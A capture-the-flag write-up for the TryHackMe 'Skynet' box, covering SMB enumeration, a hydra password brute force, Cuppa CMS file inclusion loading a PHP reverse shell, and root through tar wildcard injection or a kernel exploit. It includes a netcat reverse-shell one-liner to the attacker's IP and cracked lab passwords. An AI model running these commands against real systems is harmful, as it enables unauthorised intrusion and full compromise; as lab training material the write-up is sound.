CTF-Writeups/TryHackMe/Skynet.md
2020-10-26 18:47:38 +05:00

23 KiB

TryHackMe-Skynet

Abdullah Rizwan , Sunday 25th October,05:36 PM

NMAP

Nmap scan report for 10.10.209.122                                                                                                                  
Host is up (0.18s latency).                                                                                                                         
Not shown: 994 closed ports                                               
PORT    STATE SERVICE     VERSION                                                                                                                   
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)                                                              
| ssh-hostkey:                                                                                                                                      
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)                                                                                      
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)                                                                                     
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)                                                                                   
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                            
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                        
|_http-title: Skynet                 
110/tcp open  pop3        Dovecot pop3d                                   
|_pop3-capabilities: SASL TOP RESP-CODES CAPA AUTH-RESP-CODE PIPELINING UIDL                                                                        
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)                                                                               
143/tcp open  imap        Dovecot imapd                                   
|_imap-capabilities: capabilities SASL-IR Pre-login IDLE IMAP4rev1 have OK ID LOGIN-REFERRALS listed LOGINDISABLEDA0001 more ENABLE LITERAL+ post-lo
gin                                                                       
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)                                                                           
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                                               
                                                                          
Host script results:                                                      
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s                                                                                       
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)                                                           
| smb-os-discovery:                  
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)                                 
|   Computer name: skynet                                                 
|   NetBIOS computer name: SKYNET\x00                                     
|   Domain name: \x00                
|   FQDN: skynet                     
|_  System time: 2020-10-25T07:36:04-05:00                                                                                                          
| smb-security-mode:                                                                                                                                
|   account_used: guest
|   authentication_level: user                                            
|   challenge_response: supported                                         
|_  message_signing: disabled (dangerous, but default)                                                                                              
| smb2-security-mode:                
|   2.02:                            
|_    Message signing enabled but not required                            
| smb2-time:                         
|   date: 2020-10-25T12:36:04                                             
|_  start_date: N/A                  

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                      
Nmap done: 1 IP address (1 host up) scanned in 23.50 seconds                         

From the nmap result we can see the following ports are open

  • PORT 22
  • PORT 80
  • PORT 110
  • PORT 445

which we can enumerate

PORT 445

root@kali:~/TryHackMe/Easy/Skynet# smbmap -u anonymous -H 10.10.209.122
[+] Guest session       IP: 10.10.209.122:445   Name: 10.10.209.122                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

Here we can see only anonymous share is readable

smbclient \\\\10.10.209.122\\anonymous
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Sep 18 09:41:20 2019
  ..                                  D        0  Tue Sep 17 12:20:17 2019
  attention.txt                       N      163  Wed Sep 18 08:04:59 2019
  logs                                D        0  Wed Sep 18 09:42:16 2019
  books                               D        0  Wed Sep 18 09:40:06 2019

                9204224 blocks of size 1024. 5372244 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this. -Miles Dyson

Head over to \logs in smbshare here you will find 3 text files

smb: \> cd logs
smb: \logs\> dir
  .                                   D        0  Wed Sep 18 09:42:16 2019
  ..                                  D        0  Wed Sep 18 09:41:20 2019
  log2.txt                            N        0  Wed Sep 18 09:42:13 2019
  log1.txt                            N      471  Wed Sep 18 09:41:59 2019
  log3.txt                            N        0  Wed Sep 18 09:42:16 2019

                9204224 blocks of size 1024. 5373956 blocks available

This pretty much doesn't give anything

Only log1.txt has some potential passwords

PORT 80

Gobuster

gobuster dir -u http://10.10.209.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.209.122
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/25 18:03:31 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
Progress: 21226 / 220561 (9.62%)

hydra -l miles -P log1.txt http-post-from 10.10.209.122 "/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Unknown user or password incorrect."

Hydra

root@kali:~/TryHackMe/Easy/Skynet# hydra -l milesdyson -P log1.txt 10.10.209.122 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Login:Unknown user or password incorrect." -V

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-25 18:24:12
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.209.122:80/squirrelmail/src/redirect.php:login_username=^USER^ & secretkey=^PASS^&Login=Login:Unknown user or password incorrect.
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "cyborg007haloterminator" - 1 of 31 [child 0] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator22596" - 2 of 31 [child 1] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator219" - 3 of 31 [child 2] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator20" - 4 of 31 [child 3] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1989" - 5 of 31 [child 4] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1988" - 6 of 31 [child 5] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator168" - 7 of 31 [child 6] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator16" - 8 of 31 [child 7] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator143" - 9 of 31 [child 8] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator13" - 10 of 31 [child 9] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator123!@#" - 11 of 31 [child 10] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator1056" - 12 of 31 [child 11] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator101" - 13 of 31 [child 12] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator10" - 14 of 31 [child 13] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator02" - 15 of 31 [child 14] (0/0)
[ATTEMPT] target 10.10.209.122 - login "milesdyson" - pass "terminator00" - 16 of 31 [child 15] (0/0)
[80][http-post-form] host: 10.10.209.122   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-25 18:24:24


username :milesdyson password: cyborg007haloterminator

We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`

Now we go back to smb shares

 smbmap -u milesdyson -p ')s{A&2Z=F^n_E.B`' -H 10.10.209.122
[+] IP: 10.10.209.122:445       Name: 10.10.209.122                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  READ ONLY       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              READ ONLY       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

smbclient \\\\10.10.209.122\\milesdyson -U milesdyson enter password )s{A&2Z=F^n_E.B`

smb: \> dir
  .                                   D        0  Tue Sep 17 14:05:47 2019
  ..                                  D        0  Wed Sep 18 08:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 14:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 14:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 14:05:14 2019
  notes                               D        0  Tue Sep 17 14:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 14:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 14:05:14 2019

                9204224 blocks of size 1024. 5367008 blocks available


We see notes directory

smb: \> cd notes                                                                                                                             [9/775]
smb: \notes\> dir                                                                                                                                   
  .                                   D        0  Tue Sep 17 14:18:40 2019 
  ..                                  D        0  Tue Sep 17 14:05:47 2019 
  3.01 Search.md                      N    65601  Tue Sep 17 14:01:29 2019 
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 14:01:29 2019 
  2.08 In Practice.md                 N     7949  Tue Sep 17 14:01:29 2019 
  0.00 Cover.md                       N     3114  Tue Sep 17 14:01:29 2019 
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 14:01:29 2019 
  important.txt                       N      117  Tue Sep 17 14:18:39 2019 
  6.01 pandas.md                      N     9221  Tue Sep 17 14:01:29 2019 
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 14:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 14:01:29 2019 
  3.02 Planning.md                    N    71657  Tue Sep 17 14:01:29 2019 
  1.04 Probability.md                 N    62712  Tue Sep 17 14:01:29 2019 
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 14:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 14:01:29 2019 
  1.03 Calculus.md                    N    40779  Tue Sep 17 14:01:29 2019 
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 14:01:29 2019 
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 14:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 14:01:29 2019 
  6.00 Appendices.md                  N       20  Tue Sep 17 14:01:29 2019 
  1.01 Functions.md                   N     7627  Tue Sep 17 14:01:29 2019 
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 14:01:29 2019 
  2.04 Model Selection.md             N    33383  Tue Sep 17 14:01:29 2019 
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 14:01:29 2019 
  4.00 Simulation.md                  N       20  Tue Sep 17 14:01:29 2019 
  3.05 In Practice.md                 N     1123  Tue Sep 17 14:01:29 2019 
  1.07 Graphs.md                      N     5110  Tue Sep 17 14:01:29 2019 
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 14:01:29 2019 
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 14:01:29 2019 
  5.03 Anonymization.md               N     2516  Tue Sep 17 14:01:29 2019 
  5.01 Process.md                     N     5788  Tue Sep 17 14:01:29 2019 
  1.09 Optimization.md                N    25823  Tue Sep 17 14:01:29 2019 
  1.05 Statistics.md                  N    64291  Tue Sep 17 14:01:29 2019 

Reading the contents of important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Again running gobuster on the hidden directory

gobuster dir -u http://10.10.209.122/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.209.122/45kra24zxs28v3yd/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/25 19:08:35 Starting gobuster
===============================================================
/administrator (Status: 301)
Progress: 6554 / 220561 (2.97%)


searchsploit cuppa
------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                   | php/webapps/25971.txt
------------------------------------------------------------------------------------------------------------------ ---------------------------------

We can see that

An attacker can exploit this issue with a browser.

The following example URIs are available:

http://www.example.com/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://www.example.com/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

So using the concept of RFI (Remote File Inclusion) we can include a any remote file since LFI (Local File Inclusion) vulnerability exists.

LFI

http://10.10.209.122/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

RFI

Grab a reverse shell from pentest monkey https://github.com/pentestmonkey/php-reverse-shell

Change the ip and port and then start a http server along with a listener

nc -lvp [port]

python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

10.10.209.122/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.3.143:8000/php-reverse-shell.php

This will be your RFI

Reverse Shell

Privilege Escalation

Method 1

Here we can see tar cf /home/milesdyson/backups/backup.tgz * so this wildcard makes this command to be vulnerable

https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

Execute these commands on the target machine

mkfifo /tmp/lhennp; nc 10.14.3.143 5555 0</tmp/lhennp | /bin/bash >/tmp/lhennp 2>&1; rm /tmp/lhennp echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1 tar cf archive.tar *

Then set up netcat listener

nc -lvp 5555

id
uid=0(root) gid=0(root) groups=0(root)
ls -la
total 80
drwxr-xr-x 8 www-data www-data  4096 Oct 26 08:26 .
drwxr-xr-x 3 root     root      4096 Sep 17  2019 ..
drwxr-xr-x 3 www-data www-data  4096 Sep 17  2019 45kra24zxs28v3yd
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 admin
drwxr-xr-x 3 www-data www-data  4096 Sep 17  2019 ai
-rw-rw-rw- 1 www-data www-data     0 Oct 26 08:02 archive.tar
-rw-rw-rw- 1 www-data www-data     1 Oct 26 08:02 --checkpoint=1
-rw-rw-rw- 1 www-data www-data     1 Oct 26 08:02 --checkpoint-action=exec=sh shell.sh
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 config
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 css
-rw-r--r-- 1 www-data www-data 25015 Sep 17  2019 image.png
-rw-r--r-- 1 www-data www-data   523 Sep 17  2019 index.html
drwxr-xr-x 2 www-data www-data  4096 Sep 17  2019 js
-rwxrwxrwx 1 www-data www-data   100 Oct 26 08:26 shell.sh
-rw-r--r-- 1 www-data www-data  2667 Sep 17  2019 style.css
cd /root
ls -la
total 28
drwx------  4 root root 4096 Sep 17  2019 .
drwxr-xr-x 23 root root 4096 Sep 18  2019 ..
lrwxrwxrwx  1 root root    9 Sep 17  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Sep 17  2019 .cache
drwxr-xr-x  2 root root 4096 Sep 17  2019 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   33 Sep 17  2019 root.txt


Method 2

You can go the other way around in rooting the box by checking the kernel version

www-data@skynet:/home/milesdyson$ uname -vr
4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
www-data@skynet:/home/milesdyson$ uname
Linux
www-data@skynet:/home/milesdyson$ uname -vvv
#63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
www-data@skynet:/home/milesdyson$ 

Here the kernel version is 4.8.0 nad ubuntu version is 16.04.1

root@kali:~/TryHackMe/Medium/Skynet# searchsploit 4.8.0
------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)                      | linux/remote/42695.rb
eToolz 3.4.8.0 - Denial of Service (PoC)                                                                          | windows_x86-64/dos/45797.py
Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow                                      | windows/remote/10269.html
iCAM Workstation Control 4.8.0.0 - Authentication Bypass                                                          | windows/local/32158.txt
Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)                              | linux/local/44654.rb
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                        | linux/local/41886.c
Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference                      | linux/dos/40762.c
Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation                 | linux/local/47168.c
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation                                 | linux/local/41994.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)             | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR | linux/local/47169.c
phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery                                                           | php/webapps/44496.html
Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)                                                              | windows/local/48695.py
------------------------------------------------------------------------------------------------------------------ ---------------------------------

Here Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation stands perfect exploit

copy to your directory or download it from exploit-db then host it on your local machine

Compile the program

And you got root !!!